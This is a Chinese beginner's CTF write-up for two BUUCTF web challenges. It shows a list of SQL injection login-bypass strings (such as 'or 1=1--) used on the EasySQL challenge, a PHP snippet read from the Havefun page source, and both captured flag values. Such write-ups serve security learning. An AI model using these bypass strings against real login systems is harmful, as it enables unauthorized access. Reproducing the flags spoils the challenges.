[极客大挑战 2019]Havefun1、EasySQL(BUUCTF)

前言:

这篇文章还是是为了帮助一些

像我这样的菜鸟

找到简单的题解

今天是2022年的最后一天，

这一年我居然写了72篇文章

获得5枚勋章 

还多了14个粉丝

好了不说了，上水题的题解

EasySQL题目描述

解题工具:

不需什么工具，如题名easy sql

解题过程:

输入框都有了注入点就不用说了

先提交

admin 123456

看到提示密码错误

又看到url，就可以直接注入了

user 框里输入1'发现报错

那这题就很简单了

直接输入万能密码获得flag

这里普及一下万能密码

---

"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
1'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1%00

虽然有这么多种但目的都是一样的

注:万能密码中"#"是注释掉后半部分的意思

---

成功获得flag

flag{5a24fe63-f958-416b-898e-aa84b35a8469}

完成

Havefun题目描述

一只很可爱的猫

解题过程:

按下F12发现一段注释的PHP代码

$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
      echo 'Syc{cat_cat_cat_cat}';
}

 逐行分析一下

---

第一行

$cat=$_GET['cat'];

意思是get一个变量名字为cat

第二行

echo $cat;

意思是显示cat

第三行

if($cat=='dog'){

意思是判断cat是否等于字符串'dog'

最后一行

echo 'Syc{cat_cat_cat_cat}';

显示一堆奇奇怪怪的东西

但应该就是flag(因为看见了"{ }")

---

分析到此解法就很明确了，

get一个cat变量让他等于'dog'即可获得flag

 

成功获得flag

flag{abbab8c1-d399-415b-8e08-34752ecfb468}

完成